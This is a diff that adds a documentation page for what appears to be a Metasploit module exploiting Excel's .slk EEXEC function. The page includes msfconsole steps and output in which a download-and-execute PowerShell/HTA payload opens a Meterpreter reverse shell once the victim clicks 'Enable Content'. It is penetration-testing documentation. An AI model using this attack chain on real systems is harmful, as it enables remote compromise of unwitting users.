Add docs

documentation/modules/exploit/windows/fileformat/office_excel_slk.md

@@ -0,0 +1,49 @@
+## Introduction
+
+The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function. 
+This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
+on the target.
+
+## Vulnerable Application
+
+  Microsoft Excel
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+1. Start `msfconsole`
+2. `use exploit/windows/fileformat/office_excel_slk`
+3. `set LHOST 192.168.x.x`
+4. `run`
+5. Execute generated file and press 'Enable Content' in Excel
+
+## Options
+
+  **FILENAME**
+
+  The name of the generated .slk file.
+
+## Scenarios
+
+  ```
+  msf > use exploit/windows/fileformat/office_excel_slk
+  msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf exploit(office_excel_slk) > set lhost 192.168.146.1
+  lhost => 192.168.146.1
+  msf exploit(office_excel_slk) > set srvhost 192.168.146.1
+  srvhost => 192.168.146.1
+  msf exploit(office_excel_slk) > run
+  [*] Exploit running as background job.
+
+  [*] Started reverse TCP handler on 192.168.146.1:4444
+  [+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
+  [*] Using URL: http://192.168.146.1:8080/default.hta
+  [*] Server started.
+  ```
+  Once the victim opens the file and clicks 'Enable Content' a session should spawn:
+  ```
+  [*] Sending stage (957487 bytes) to 192.168.146.145
+  [*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500
+  ```